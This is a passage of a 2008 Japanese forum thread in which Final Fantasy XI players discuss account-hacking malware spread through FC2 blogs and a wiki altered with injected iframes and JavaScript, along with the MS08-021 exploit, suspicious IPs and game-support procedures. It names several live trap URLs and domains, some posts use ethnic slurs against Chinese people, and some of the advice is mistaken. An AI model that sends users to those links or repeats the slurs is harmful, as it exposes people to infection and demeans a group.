>>459とかでJavaスクリプトて書いてあるけど、インラインフレームの中に
実行するように改変されてたとかじゃないの?

476 :既にその名前は使われています:2008/04/11(金) 00:01:56.72 ID:8TSDHWja
【打倒】日本は聖火リレーそのものをひっくり返してやろうぜ【中華】

垢ハック騒動もあったばかりでシナへの怒りもおさまらない人が多いと思います。
そんな中、IOC緊急総会でアメリカんとこから聖火リレーなくなるかもしれん

Operation Zenkoji 4.26
http://www8.atwiki.jp/zali/pages/65.html
そしてついに日本でも善光寺作戦、開始されました
聖火リレーの日本の出発点、善光寺がこのままで良いのか迷っています
皆さんの声やメッセージを求めています(多ければ多いほどいいらしい)
欧米の過激デモや大人数でもできなかった「公式な」聖火リレー反対へ
世界初の「出発地点のボイコット」を世界中に見せつけろ!
国内の「チベットと五輪は別」ムードを変えていきましょう

見た人はぜひ応援をお願いします!

477 :既にその名前は使われています:2008/04/11(金) 00:26:59.26 ID:TT17AQoM
>>475
script srcのヤツかも?

478 :既にその名前は使われています:2008/04/11(金) 01:38:03.74 ID:VGuT7kfn
あげ

479 :既にその名前は使われています:2008/04/11(金) 03:14:08.54 ID:cq+f6A16
>>465
FC2解約組は
一番多いのが忍者ブログに移転
次点でDTIやseesaaって感じがする。

次次点でジュゲムとかエキサイトかなあ。
でもこの二箇所はアカハック問題で問題が起きた過去あり。

でFFXIブログの移転者が多くて次に狙われたりするブログ会社じゃ
いやだなーってやつがその他に引越しかねえ。

480 :既にその名前は使われています:2008/04/11(金) 03:54:00.89 ID:GOosWIpV
寝ながら保守上げ

481 :既にその名前は使われています:2008/04/11(金) 04:58:56.27 ID:tCa5FrR7
寝る前保守あげ

482 :既にその名前は使われています:2008/04/11(金) 06:31:12.36 ID:wkNmteuT
起きたので保守あげ

483 :既にその名前は使われています:2008/04/11(金) 07:40:08.00 ID:jNNb98IA
FC2利用者、右へ習え的に忍者に移動だからなぁ
次は忍者がターゲットにされそうな気がしてならない。
危険らしいので移転とか書いてあると
何がどう危険なのか本当にわかってんのか?
と心配になってくるよ・・・
移転して安心とか思ってる人が一番危ないような。

484 :既にその名前は使われています:2008/04/11(金) 08:21:11.47 ID:Y9FfJOK/
保守ぅ

485 :既にその名前は使われています:2008/04/11(金) 08:32:52.78 ID:cocLgMW4
>>483
忍者って何か便利なんかね
どこにも絶対な安全なんか無い、ってわかってる管理者は良いけどさ

486 :既にその名前は使われています:2008/04/11(金) 08:49:11.50 ID:n3cZUoUg
長いものに巻かれろ的じゃないの?
どこが良いか分からないから真似しておけ、みたいな

487 :既にその名前は使われています:2008/04/11(金) 08:58:21.05 ID:n3cZUoUg
自分的には、HTMLやCSSの編集やアフィリエイトが不可な
YahooやGooが良いと思うんだけどな。
脆弱さは自由度と引き換えだから

488 :既にその名前は使われています:2008/04/11(金) 09:07:15.05 ID:IbqmV3EP
>479
>次次点でジュゲムとかエキサイトかなあ。
>でもこの二箇所はアカハック問題で問題が起きた過去あり。

ここ詳しく
以前探したけど見つからなかったんだ
業者自体が作ったブログはこの2つ以外にもあるしな

489 :既にその名前は使われています:2008/04/11(金) 09:26:29.85 ID:QU+RNK3s
カスペルオンファインスキャンの文字化け直ったの俺だけ?

490 :既にその名前は使われています:2008/04/11(金) 09:40:50.17 ID:uNq+Fnsk
>>489
>>453 >>463

491 :既にその名前は使われています:2008/04/11(金) 10:21:41.73 ID:Zl6UmyOp
>>483
ブログ改竄の頻度が高まりあきらかにFC2が標的にされているのに現状で対策もしてもらえないFC2で継続するよりは
まだ書き換えの起こってないとこに移転しようとするのは自然な流れじゃね?

492 :既にその名前は使われています:2008/04/11(金) 11:20:23.04 ID:uNq+Fnsk
>>483
>何がどう危険なのか本当にわかってんのか?

そもそも、FC2がどうやって改竄されたか、明確に説明できる人っているのか?
ここでは、色々言われてるけど、あくまで憶測だろ。
運営元が何も公表しない限り、改竄者にしか分からんと思うが。

>>483 がFC2の改竄のプロセスを、本当に分かってるなら、
具体的に説明して欲しいな。

493 :既にその名前は使われています:2008/04/11(金) 11:32:35.72 ID:Zl6UmyOp
てことはつまり、
・FC2が情報を開示せず調査もしない以上改竄プロセスを知っているのは改竄した業者本人
・手塩をかけてFC2改竄手段を確保した現在、踏み台ブログが他所に移転されて困るのは業者
・上の二点から推測すると>>483は業者
こういうことですか><

494 :既にその名前は使われています:2008/04/11(金) 12:36:30.43 ID:Y9FfJOK/
>>487
>脆弱さは自由度と引き換えだから
その通りだね〜

495 :既にその名前は使われています:2008/04/11(金) 13:16:01.90 ID:ys6nu6lR
>>485
忍者は文章、画像、テンプレなど全データを
ツールひとつでそっくり移動できる唯一の無料ブログだった
つかFC2自体自由度の高いところだから、同等なところなんて限られてるんだよね
もちろん右へ倣えのやつも多いだろうけど

496 :既にその名前は使われています:2008/04/11(金) 14:02:19.09 ID:ba9kRLE3
■過去改竄被害blog一覧
     黒猫奮闘記(インラインフレーム・1回改竄され修正済み)
     ぺってん(インラインフレーム・1回改竄され修正、JUGEMへ移転済)
     戦士スキー(インラインフレーム・2回改竄され修正済み)
     某青魔道士(インラインフレーム・2回改竄され閉鎖)
     ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
     ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
     ある黒魔道士の軌跡(Javaスクリプト・1回改竄され修正済み)
     FF11初心者の館(Javaスクリプト・1回改竄され修正中)
     Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・2回改竄され修正済み)
     FINAL FANTASY XI 散策日記(インラインフレーム・1回改竄され修正済み)

497 :既にその名前は使われています:2008/04/11(金) 14:08:51.08 ID:NeFjxtlH
これってパスワード毎回手入力にしても
パス抜かれるの?

498 :既にその名前は使われています:2008/04/11(金) 14:11:22.06 ID:LWpHMVCM
今のところ無いみたいだけど そのうちキーロガー型に移行するだろうな。

499 :既にその名前は使われています:2008/04/11(金) 14:13:23.21 ID:Rod7IT9P
>>497
感染したウイルスのタイプによる。
一応現在はキーロガー型のウイルス少ないから
パスワード毎回手入力は効果的な安全策といえるが、
安心してると業者も優先的にキーロガーの開発したりするので
油断は出来ない。

500 :既にその名前は使われています:2008/04/11(金) 14:26:11.94 ID:cocLgMW4
>>495
移動が楽なのか、サンクス

501 :既にその名前は使われています:2008/04/11(金) 15:22:55.62 ID:vg8mPE+D
獣wikiのリンク先がttp://onedayl.blog118.fc2.c●mってのになってて踏んじゃったんだがヤバイ?


502 :既にその名前は使われています:2008/04/11(金) 15:23:56.43 ID:Zl6UmyOp
みてないけどやばいんじゃね?

503 :既にその名前は使われています:2008/04/11(金) 15:28:24.10 ID:vg8mPE+D
 /(^o^)\ナンテコッタイ

504 :既にその名前は使われています:2008/04/11(金) 15:39:59.97 ID:PVB6pnH8
>>501
中華の罠(既出の罠ドメインarticlelin入り)、獣Wikiは既に修正されてた。
FC2通報済み。

だがFC2の問い合わせ画面にこんなものが新たに追加されてた。

FC2ブログからのスパム行為は、確認が出来次第凍結などの厳しい処置をとらせていただいております。
ご通報の際は、スパムコメント・スパムトラックバックを削除せず、投稿された記事URLなどをサポートまで
お知らせいただきます様お願いいたします。
確認が取れない場合は、対応することができませんのでご了承くださいませ。

気をつけてくれよな!

505 :既にその名前は使われています:2008/04/11(金) 16:10:47.11 ID:PVB6pnH8
こんな記事があったんで貼り

P2Pのダウンロードファイルの67%はウイルス付き
「銀行口座情報よりもオンラインゲーム情報を盗み出すマルウェアが急増している」とG DATAでは警告している。
http://www.itmedia.co.jp/enterprise/articles/0804/10/news085.html

オンラインゲームを標的とした攻撃の被害額は数億円規模に上るとされ、
銀行口座やクレジットカードなどの情報を標的にした攻撃を含めると、被害額は数千億円規模になると同社では試算。
また、サイバー犯罪者の関心がオンラインゲームへ移りつつあり、「今後はP2Pのダウンロードファイルにマルウェアを仕掛ける手口が広がる恐れがある」と同社では警告している。


506 :既にその名前は使われています:2008/04/11(金) 16:20:38.10 ID:KNeyChLD
>>485
忍者は容量が無限、テンプレートがいじれる、広告が目立たないっていうのが大きいと思う。
あと多くのブロガーが元々忍者解析使ってたから楽に乗り換えられるってのも良かったのかも。

507 :既にその名前は使われています:2008/04/11(金) 16:21:30.38 ID:00X9KYVy
なんか段々大事になりつつあるけど
事の発端は誰がみつけたんだこれ…
いつ頃から攻撃されてんの?

508 :既にその名前は使われています:2008/04/11(金) 16:46:52.86 ID:vg8mPE+D
とりあえず片付けてたPS2引っ張り出してパス変更したぜ
PC環境弄りたくなかったからHDDの換装も見送ってたけどついでにやるか
まぁ火狐のお陰で大丈夫のようだが気持ち悪いんでな〜!
氏ね糞業者!

509 :既にその名前は使われています:2008/04/11(金) 16:49:00.35 ID:5wnPmMaN
【ネット】バンダイビジュアルの「デジタル・ビート」HPが不正改竄、ウイルス感染の恐れ
ttp://news24.2ch.net/test/read.cgi/moeplus/1207656658/

510 :既にその名前は使われています:2008/04/11(金) 17:00:32.71 ID:xmxnxgDG
また週末がくるか。注意喚起上げ

511 :既にその名前は使われています:2008/04/11(金) 17:22:18.65 ID:G3GQzDtn
>>507
段々とか抜かすな。危機感なさすぎ。
今のネットは「はい、今から地球終了します」と言われてもおかしくないぐらい最悪。
とっとと、>>1-10呼んでウイルス消去&セキュ強化してこい。
>>508
ファイアウォール入れないなら何をしても常に手遅れ。なんでもいいから、レジストリ管理ソフトもいれとけー

512 :既にその名前は使われています:2008/04/11(金) 17:55:49.34 ID:U8G85LvN
>>511
ウイルス感染に関しては手遅れかもしれないがPS2からパス変更してるんだから
もう少し分かりやすくレスしてやれw単に手遅れと言われたら怖いだけじゃないか

>>508
PSからパス変更をしたなら一時しのぎになるけど、PCが完全に安全だと
自信がつくまでPCでのログインは避けた方がいいよ。

513 :既にその名前は使われています:2008/04/11(金) 17:59:30.93 ID:774R4Rro
>>504
>ご通報の際は、スパムコメント・スパムトラックバックを削除せず、
って・・・ 確認すぐ来てくれるのならいいけど・・・

514 :既にその名前は使われています:2008/04/11(金) 18:41:13.16 ID:2zZzRXkq
PG2が台湾IPへの送信を弾いているんですけど、このIPって危険ですか?
203.73.25.209.80
203.73.25.210.80

515 :既にその名前は使われています:2008/04/11(金) 18:49:36.09 ID:6fmYajRb
CYBERLINK CORP.
http://203.73.25.210

516 :既にその名前は使われています:2008/04/11(金) 19:01:43.84 ID:q3qmBk/X
RSSだろそれ

517 :既にその名前は使われています:2008/04/11(金) 19:06:05.14 ID:tCa5FrR7
>>514
>>515のとおりソフト会社サイバーリンク社のIPだね。
ざっと見ただけだけどDVD再生・記録とかのソフトを扱ってるみたいだから、
それの更新の確認とかでつながってるんだと思う。まず自分のPCにサイバーリンク製の
ソフトがあるか確認して、それの設定を確かめることができたら該当IPをPG2の許可リストに入れるべし。

518 :既にその名前は使われています:2008/04/11(金) 19:11:26.80 ID:q3qmBk/X
アメブロじゃないのw

519 :既にその名前は使われています:2008/04/11(金) 19:12:08.17 ID:q3qmBk/X
あ、ふつうにまちがえたごめんw

520 :既にその名前は使われています:2008/04/11(金) 19:24:01.38 ID:6fmYajRb
レッド・シェリフ株式会社
red sheriff 61.213.156.134:80

俺んところはSleipnir立ち上げると、サイト開いてないのにここに通信に行くw

521 :既にその名前は使われています:2008/04/11(金) 19:27:53.29 ID:2zZzRXkq
>>515-517様回答ありがとうございました。
ご指摘の通りPowerDVDを起動したところ現象が再現されました。
これで胸を撫で下ろす事ができそうです。

しかし、このスレやまとめページを見てとりあえず色々入れてみましたが、
ちょっとした事で慌てるなんて無知の裏返しですよね;
これからはただ入れるだけではなく自分なりに突っ込んで勉強しようと思います。

重ねて回答ありがとうございました。

522 :既にその名前は使われています:2008/04/11(金) 19:35:32.74 ID:4jbFnqc6
ttp://bb.watch.impress.co.jp/cda/special/21552.html

>グレーゾーンをすべてスパムと仮定した場合、どのくらいの数になるのでしょうか。

>明言はできませんが、おそらく50〜60%程度

なんかブログ全体が荒廃しとるな  
一部はもうスラム化といっても過言じゃないのかも

523 :既にその名前は使われています:2008/04/11(金) 20:08:28.30 ID:ys6nu6lR
>>496
某青魔道士、忍者ブログで復活してる。
ttp://bml.blog.shinobi.jp/
改竄被害の中では一番まともな対応をしたところなので頑張って欲しい

524 :既にその名前は使われています:2008/04/11(金) 21:03:24.07 ID:tCa5FrR7
>>523
BLMじゃなくてBMLだから一瞬偽URLかと思ってしまった
blmのほうは何か単発の日記に取られてるんだな

525 :既にその名前は使われています:2008/04/11(金) 21:35:09.53 ID:5OLid6OL
4月の月例パッチ「MS08-021」の脆弱性を悪用するファイルが早くも出回る
ttp://internet.watch.impress.co.jp/cda/news/2008/04/11/19190.html

(´・ω・`)

526 :既にその名前は使われています:2008/04/11(金) 21:35:53.63 ID:YhD++apI
RMT

527 :既にその名前は使われています:2008/04/11(金) 21:38:16.60 ID:+FmRrEyy
セキュリティ関連の穴大杉だろjk…

528 :既にその名前は使われています:2008/04/11(金) 21:39:52.46 ID:YhD++apI
脆弱すぎる

529 :既にその名前は使われています:2008/04/11(金) 21:43:31.63 ID:1C3j6GLy
>>524
BLMじゃ黒魔道士になっちゃうよ!

530 :既にその名前は使われています:2008/04/11(金) 21:50:54.49 ID:tCa5FrR7
>>529
アッー!
じゃあ青魔はBLUかw
BLUのほうも先客がいるみたいだねw

531 :既にその名前は使われています:2008/04/11(金) 21:54:42.09 ID:aUAwE7cG
>>525
この記事のタイトルだと「MS08-021」に脆弱性があるみたいに
勘違いするけど、「MS08-021」を適用してれば問題ないってことだよな。

532 :既にその名前は使われています:2008/04/11(金) 21:59:34.58 ID:5OLid6OL
>>531
そうですね。
アップデートをし忘れていると即感染するかもしれないわけですね。
アップデートし忘れてる人多そうですよね。(´・ω・`)

533 :既にその名前は使われています:2008/04/11(金) 22:00:08.50 ID:PVB6pnH8
>>531
>「MS08-021」を適用してれば問題ないってことだよな。
ちがうよ、「MS08-021」自体に脆弱性があってそれを悪用する事例が早速出たってこと。

気をつけてくれよな!

534 :既にその名前は使われています:2008/04/11(金) 22:01:50.97 ID:uBHd8Wiv
ジオン軍対策しろ

535 :既にその名前は使われています:2008/04/11(金) 22:07:59.38 ID:PVB6pnH8
>>525のパッチの脆弱性悪用の記事にあったシマンテックブログを部分的にエキサイト翻訳
また中華の仕業って事で。

しかしながら、功績("top.jpg"と命名される)は機能的なペイロードを含んでいます。
(それは、セカンダリファイル(word.gif)をダウンロードします)。
Word.gifが本当にそうである、実行可能である、それはうまくいっている感染に続く走行でしょう。
主な機能は中国の数人のホストに連絡して、おそらく、追加悪質なコードをダウンロードするのに
iexplore.exeを使用するだろうことです。

536 :既にその名前は使われています:2008/04/11(金) 22:10:21.55 ID:BY+WsDSU
このため、MS08-021を適用していないマシンの場合には、
Internet Explorerなどでこの画像を表示しただけで、ウイルスなどを実行させられる危険がある。

文中にこう書いてあるにゃ
よく読むにゃ

537 :既にその名前は使われています:2008/04/11(金) 22:55:53.60 ID:PVB6pnH8
>>536
判りにくい記事を改めて読み直し、俺の勘違い、ゴメン。

お詫びといっちゃ何だが、中華の罠ドメイン登録を確認したんで気をつけてくれよな!!
ヤプログモドキ現る、と。
Domain name: yaplogjp.com
Registrant Contact:
longyan Fujian 364000
cn
Created: 2008-04-09

538 :既にその名前は使われています:2008/04/11(金) 23:29:02.11 ID:Zl6UmyOp
罠ドメインってその本家にも報告するべきなんだろか

539 :既にその名前は使われています:2008/04/11(金) 23:49:11.99 ID:on5wD0jt
上の記事タイトルで勘違いしちゃうよね
要は脆弱性の中身が公開されてわかってから細工を施して
パッチ当ててない奴狙ってるって事かな?
だとしたらMSも詳しいこと書かなきゃいいのにと思った

540 :既にその名前は使われています:2008/04/12(土) 00:15:38.50 ID:EeCFvqed
保守

541 :既にその名前は使われています:2008/04/12(土) 00:54:18.67 ID:3v6A11ny
ttp://www.ugtop.com/spill.shtml

http://www.ugtop.com/spill.shtml

書くにん

542 :既にその名前は使われています:2008/04/12(土) 01:35:29.39 ID:fyooT3Hk
保守

543 :既にその名前は使われています:2008/04/12(土) 02:06:48.23 ID:OLeYW+cV
>>472
遅れてごめん
//ffkh.blog31.fc2.com/blog
これかな。FF13スレのテンプレだったからPCうとい人結構踏んでたわ。
管理者が中華になっていたが、消してもらったみたい

544 :既にその名前は使われています:2008/04/12(土) 02:07:12.18 ID:OLeYW+cV
>>472

545 :既にその名前は使われています:2008/04/12(土) 02:18:58.41 ID:iZbpe0Mc
以前■eが垢ハックの救済策検討します〜って告知だした時のメールが
ようやく届いた。GMも遅いけどメールもおせーのなwwww
質問の内容は、本人からしか受け付けないくせに
垢複数持ってないと本人からGMコールできねーだろカス。
みたいな内容で送った。
それの回答。

プレイオンラインアカウントを複数お持ちの場合は、そのアカウントよりGMコールを
いただくことで、ログイン制限などの対応を行う事が可能です。
複数お持ちでない場合には、お知り合いの方を介してGMコールを行っていただくことで
ご相談手順などをご案内できる場合がございます。
なお、お知り合いの方からのGMコールの場合、ご本人様である確認がとれないため
基本的にはログイン制限などの直接的な対応は行っておりませんが、
状況を確認させていただいた結果、状況によっては、ログイン制限などの対応が
行える場合がございます。

とのことだ。ようするに、本人じゃなくても良いから、ひとまずGMコールしろ。っつうことだな
すげー今更だが、一応進歩してる…のかな。
既出だったらもうしわけない

546 :既にその名前は使われています:2008/04/12(土) 02:26:55.11 ID:SQ28rOv8
一歩前進ってことなのかな?w
とりあえずフレとリアルで連絡とれるようにしておいたほうがいいってことか。

547 :既にその名前は使われています:2008/04/12(土) 03:05:29.05 ID:GpfBxktz
現在バハムートにて垢ハック最中との報告有り

548 :既にその名前は使われています:2008/04/12(土) 03:09:09.33 ID:9rcfGFqV
厨蚊氏ね

549 :既にその名前は使われています:2008/04/12(土) 03:11:01.36 ID:EPcO349Q
また週末狙いか、中華はマジ滅びろ

550 :既にその名前は使われています:2008/04/12(土) 05:15:00.08 ID:pICY7g5S
寝る前ほす

おやすみー(・∀・)

551 :既にその名前は使われています:2008/04/12(土) 05:58:58.49 ID:4fEDr3Va
>>545
これが救済拡大だったら切れるぞ

552 :既にその名前は使われています:2008/04/12(土) 07:12:44.16 ID:GpfBxktz
GMコールしたら、本人以外だめですってきっぱりいわれたらしいぜ

553 :既にその名前は使われています:2008/04/12(土) 07:14:35.54 ID:GpfBxktz
ちなみに今朝のことだ。シャウトで結果言ってた

554 :既にその名前は使われています:2008/04/12(土) 08:09:50.15 ID:wfg44W1d
■から着たメールとGMの見解が違うから、お前じゃ話にならんから他のGMに
変われでいいんじゃね?
まあ権限もちは休んでるから無理だろうが。

555 :既にその名前は使われています:2008/04/12(土) 08:40:26.89 ID:SAQIANbN
GMにマニュアルにない事を対応させるには
責任者を呼ぶしかないと思う。
バイトGMだと絶対マニュアル通りの事しかさせないはず。
クレーム処理してる仕事してるから分かる。
絶対に下っ端のアドリブで前例を作らせない様にしているはずだ。
まず垢ハックでフレからのGMコールは
上の立場にある奴に確認させる事から始めるべきだと思うよ。
他のGMではなく上の立場のGMに代われと言うべきだろう。


556 :既にその名前は使われています:2008/04/12(土) 08:43:05.84 ID:aw5+urFc
おはにゃ〜ん

557 :既にその名前は使われています:2008/04/12(土) 08:49:58.04 ID:aw5+urFc
サポセンの電話応対でさえ
本人と確認取れない限り聞く姿勢さえないんだよ?スクエニは

家人の当人が、仕事で電話している暇さえないので代理で掛けた時に
性別違うので本人でない事丸分かりだった為
聞く事さえしてもらえなかったよ

こっちも出方変えて
ではこのパターンが発生した時、そちらの対処はどうなりますか? と第三者が客観的な質問している体制に変えたら
何とか答えてもらう事が出来たけど

サポセンでさえこうなのだから
GMに融通が利かない事は聞くまでもなく想像出切るw

とにかくスクエニへのサポセンGMの、実際的な対処してもらう時には
当人でないと絶対ダメだよ。
性別違ってたら、その段階でOUT

558 :既にその名前は使われています:2008/04/12(土) 10:49:16.31 ID:SAQIANbN
当人じゃなくてもいいってメールを受け取った奴がいるなら
上の会議でそういうことしてもいいよってことになったんじゃねーの?

じゃなきゃ545が嘘をついてない限り
1企業がそういう返信しないと思うんだが。
で、いつからそうするってのがまだ決まってないのかもな。
マニュアル変更にもいつからっての大事だと思うし。


559 :既にその名前は使われています:2008/04/12(土) 11:08:47.20 ID:a762u6ax
すいません
今更ながらIDパスワードの変更の仕方を教えてください

メンバーパスワードとは違うんですよね..?

560 :既にその名前は使われています:2008/04/12(土) 11:16:16.66 ID:guQSpRif
>>559
IDは変更できない

パス変更はPOL>サービス&サポート>会員情報>任意の項目からプレイオンラインパスワード変更

PC版の手順だがPS2も似た感じだろうか

561 :545:2008/04/12(土) 12:39:28.46 ID:K8sYcw7V
↑のメールの話は嘘じゃなくマジだぜ
GMごとに対応が違うってのは昔からよく言われてるよな
上位のGMにチェンジ!でおkじゃないかな。
どこら辺のGMならそういう対応してくれるのかーとか
そういうの書いてなかったから何ともいえないが

562 :既にその名前は使われています:2008/04/12(土) 13:47:08.84 ID:5uxZBf9n
週末あげー

563 :既にその名前は使われています:2008/04/12(土) 13:58:22.95 ID:aXfOtc86
>>553
その対応は、サポセン対応としては普通なのぜ?何処でもそう言うぜ。
性別が違う場合、特に女性が男の代わりで消去とか普通にやってくる。
ほら、携帯に女性から電話かかってきたら、やたらと(嫉妬で)消したがるバカ女とかよく聞く話しだろ?

そのために、先ず断りいれて、相手の素性トークで調べて(この際怒らせても構わない。怒ったら、電話かけた事とぼけるとか普通出来ないだろ?)
取りあえず話しとして押さえといて、その日のうちに男の方から電話あれば確定させる…って手法。
本当に大切な用事なら昼間であろうと携帯から電話かけるしな。

まあ、会社からしてみれば、クレームも一つの情報収集(てか、ほぼこれに頼ってるかな…日本人はリサーチしにくいよ)だから、そんな愚痴でもいいから、悪いと自分が思ったら出していってくれや。

564 :既にその名前は使われています:2008/04/12(土) 16:10:39.67 ID:EPcO349Q
もし被害にあったら親しいフレも別垢も無い俺はどうすりゃいいんだ?w

565 :既にその名前は使われています:2008/04/12(土) 16:11:19.56 ID:K8sYcw7V
>>564
ここの住民に助けてもらう

566 :既にその名前は使われています:2008/04/12(土) 16:37:43.96 ID:wfg44W1d
>>561
できたら545の個人情報を消したメールのSSをUPして欲しい。

変な対応するGMはチャンジしたらいいって知らない人結構多いみたいね。

567 :既にその名前は使われています:2008/04/12(土) 17:58:40.53 ID:/XZDBCsU
夕食作成前あげ

568 :既にその名前は使われています:2008/04/12(土) 18:01:34.01 ID:K8sYcw7V
>>566
ん、SSうpか。了解。
ちょっとまってね

569 :既にその名前は使われています:2008/04/12(土) 18:04:11.50 ID:gQRKJt95
本人じゃないとだめと言うは仕方がないと思うな。
逆に本人以外でもOKだったら垢ハック以上の問題になると思うな。

570 :既にその名前は使われています:2008/04/12(土) 18:08:47.52 ID:K8sYcw7V
ttp://tune.ache-bang.com/~vg/outitem/up/img/19283.png
うpしてきた。前後の数行はみ出ちゃってるけど
ここが見えれば問題ないかな。
URL踏むの怖いッテイウ人はちゃんとチェックを

571 :既にその名前は使われています:2008/04/12(土) 18:09:52.23 ID:Yg4ozeFP
365日・24時間対応しろ

572 :既にその名前は使われています:2008/04/12(土) 18:20:07.37 ID:K8sYcw7V
状況によっては、とか凄く曖昧に書かれてて
ぶっちゃけなんともいえないんだよな

573 :既にその名前は使われています:2008/04/12(土) 19:12:30.18 ID:wfg44W1d
>>570
乙。

被害者もどうしていいかわからない場合多いから、適当なGMなら交代迫れるね。

574 :既にその名前は使われています:2008/04/12(土) 19:13:21.37 ID:zBQhSwLl
>>572
まあIPがブラックリストに載ってるところからだったら
対応しなくも無いということだろう。

575 :既にその名前は使われています:2008/04/12(土) 19:28:31.01 ID:/a7PrVEC
LimeligtNetworks ってのにHTTPで通信してるのなんでしょう・・・?
以前はP2Pにチェック入れてなかったから出るようになったのかしら?


576 :既にその名前は使われています:2008/04/12(土) 19:46:55.81 ID:EeCFvqed
>>570
俺ん所にも同じ文面で届いてたわ。
01:24ッてなってるから2008/04/12付けだな、ウチに届いたの。
つうか深夜化よ、頑張ってるんだな〜。でもまだまだ足らないよな。

577 :575:2008/04/12(土) 19:55:32.77 ID:/a7PrVEC
自己解決 P2Pのリスト開いたら載ってました
意図しないでなんか通信してんのなんかきもちわりぃ・・・

578 :既にその名前は使われています:2008/04/12(土) 22:20:29.56 ID:HR+QK1E2
254 サルベージ

579 :既にその名前は使われています:2008/04/12(土) 22:39:14.36 ID:z7bxjrd8
ケロロ小隊 ポコペン侵略せよ

ポコペン ポコペン ポコペン ポコペン ポコペン
 ポコペン ポコペン ポコペン ポコペン ポコペン
ポコペン ポコペン ポコペン ポコペン ポコペン
 ポコペン ポコペン ポコペン ポコペン ポコペン
ポコペン ポコペン ポコペン ポコペン ポコペン

580 :既にその名前は使われています:2008/04/12(土) 23:00:48.86 ID:7bGyqQ2K
獣さんのWiki書き換えてるのはHKやTWだ
やりづらいなあ

581 :既にその名前は使われています:2008/04/12(土) 23:01:19.40 ID:S6n/AIXk
現在【FF11獣使いWiki - PukiWiki】内のリンクが書き換えられて、
iframeの仕込まれた一見普通のブログに飛ばされ
ワームがダウンロードされます。
獣ソロの狩場のレベル別の所注意、、、
FC2じゃないな〜

582 :既にその名前は使われています:2008/04/12(土) 23:17:54.52 ID:7bGyqQ2K
トップページのリンクもみんなヤられてる
この一週間くらい書き換え合戦が続いてる様子
システム側でなんらかの防衛措置を執らない限り無限ループかも

583 :既にその名前は使われています:2008/04/12(土) 23:26:28.41 ID:ktDELmL6
この2〜3日が活性化wしてるのか特に激しくなってる
コメ欄にも書いたけど10数分でもとに戻された日にゃ・・・

584 :既にその名前は使われています:2008/04/12(土) 23:44:50.27 ID:AXOq38EC
罠ページに飛ばすように変更してるIPを弾く設定にできないのかな?
罠リンク仕込んでる奴らが串使うか、別のプロパイダに変えるまでは安全になると
思うけど。

585 :既にその名前は使われています:2008/04/12(土) 23:46:24.96 ID:K8sYcw7V
一時的に特定の人物以外編集できないようにするなり
一時編集凍結なりできないものかな?
罠リンクにされて被害出すよりは良いかなと

586 :既にその名前は使われています:2008/04/12(土) 23:49:33.39 ID:ktDELmL6
紹介していれてもらったspam_filter.phpにその辺の設定があるんだけど、
管理人さんが作業しないことにはにんともかんともにんにんみたいな。

587 :sage:2008/04/13(日) 00:24:48.14 ID:33QKWMoF
獣さんの所で踏んじゃったんだけど、
lanケーブル抜いてウィルスチェックすればおk?
1時間40分程チェックしてるが、
今のところ問題無い模様。
ソフトは無料版のAVGを使用。
終了次第、パスワード変更はするつもり。
(ログイン前のやつは変更済み。)
wiiから初かきこでした。


588 :既にその名前は使われています:2008/04/13(日) 00:33:24.56 ID:g+X0L1QW
これってそもそもAVGで検知できるん?

589 :既にその名前は使われています:2008/04/13(日) 00:39:20.64 ID:33QKWMoF
>>588
avgじゃやっぱりだめ?


590 :既にその名前は使われています:2008/04/13(日) 00:47:31.51 ID:DzvOp/KY
javascriptとiframe切っとけば良いだけの話なのになんでこんな伸びてんの?

591 :既にその名前は使われています:2008/04/13(日) 00:55:45.56 ID:yubANlX/
今後、>>525の脆弱性を使ったタイプが出てきたりしたら、
>>590の対策じゃアウトだよな。

592 :既にその名前は使われています:2008/04/13(日) 00:57:16.86 ID:g+X0L1QW
>>590
そんな事言ったらWindows以外のブラウズ用OSマシンつかっとけっていう話になるだろうが

593 :既にその名前は使われています:2008/04/13(日) 01:21:53.56 ID:DzvOp/KY
確かに厳密に言うと100%大丈夫とは言い切れないけど、それは垢ハックどーのこうのじゃなくて
windows使う限り仕方ない事
javascriptとiframe切っておくのが現時点で最も簡単で最も効果が高い対策法であることは事実

594 :既にその名前は使われています:2008/04/13(日) 01:39:55.70 ID:OpsNwd9x
ウィンドウ閉まってニコニコ動画見て数分・・・・・
タイムアウトです〜・・・ → 再接続しますパスワードを入力してください →  パスワードが間違ってます


その後ちゃんと接続できたがなんだったんだろ

595 :既にその名前は使われています:2008/04/13(日) 01:43:23.53 ID:VSAODmE8
100%のセキュリティなんてない。いかにして100%に近づけるかの問題。
セキュリティフィックスパッチの適用、アンチウイルスソフトの導入などなど
できる範囲であらゆる対策を講じておくことが大事。

> javascriptとiframe切っておくのが現時点で最も簡単で最も効果が高い対策法であることは事実
既知の穴を塞ぐほうが簡単で効果的だと思うぞ。

それと、罠サイトや改竄対策情報の交換もこのスレでは有用なことなんだよ。

596 :既にその名前は使われています:2008/04/13(日) 01:53:45.46 ID:p3GHE3Pc
11関係は今はいけねーな。本当に。

モンハン関係やられたら、どんだけ被害増えるんだろうな。
PC知識ないクソガキがたくさん…

597 :既にその名前は使われています:2008/04/13(日) 01:54:34.42 ID:g+X0L1QW
モンハンは本体プログラム自体がOS破壊ウィルスだった事があるから気にするな

598 :既にその名前は使われています:2008/04/13(日) 02:02:32.68 ID:dN/km0/A
FFもBaajonAppu祭りに伴うBA失敗⇒OS破壊時代があったよな。

599 :既にその名前は使われています:2008/04/13(日) 02:07:20.93 ID:p3GHE3Pc
なんかバージョンアップしたらすごいことになってた人いたよな
宙に浮いたり

できるスーパーナイトだっけかw

600 :既にその名前は使われています:2008/04/13(日) 03:10:17.49 ID:B4auWBFa
>>599
マイケルのゴブ紀行 -番外変-:スペシャルパッチと課せられた試練
http://blog.livedoor.jp/roaming_sheeps/archives/15080197.html

601 :既にその名前は使われています:2008/04/13(日) 03:51:21.74 ID:jWyqFs8p
>575
http://209.85.175.104/search?q=cache:jiQPwddR87IJ:bbs.higaitaisaku.com/cbbs.cgi%3Fmode%3Done%26number%3D96929%26type%3D96876%26space%3D45%26no%3D0+%22LimelightNetworks%22&hl=ja&ct=clnk&cd=9&gl=jp&lr=lang_ja
ググってみたらこんなんあったけど、どうなんかね


602 :既にその名前は使われています:2008/04/13(日) 05:54:51.47 ID:yaPwfT6G
バンダイビジュアル、改竄されてたが直ったらしい。
www.bandaivisual.co.jp/support/info.html
2008年4月4日23時30分頃、弊社ウェブサイト・商品情報ページの一部に
不正改竄が発見されたため、同日23時50分より弊社商品検索サイトおよび
